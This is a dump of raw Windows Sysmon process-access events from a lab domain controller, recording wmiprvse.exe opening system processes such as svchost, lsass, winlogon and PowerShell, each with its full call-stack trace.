15:59:27.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024814Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024813Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024812Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024811Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024810Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024809Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024808Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.397{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025126Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025125Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025124Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025123Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025122Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025121Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025120Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025119Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025118Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025117Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025116Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025115Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025114Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 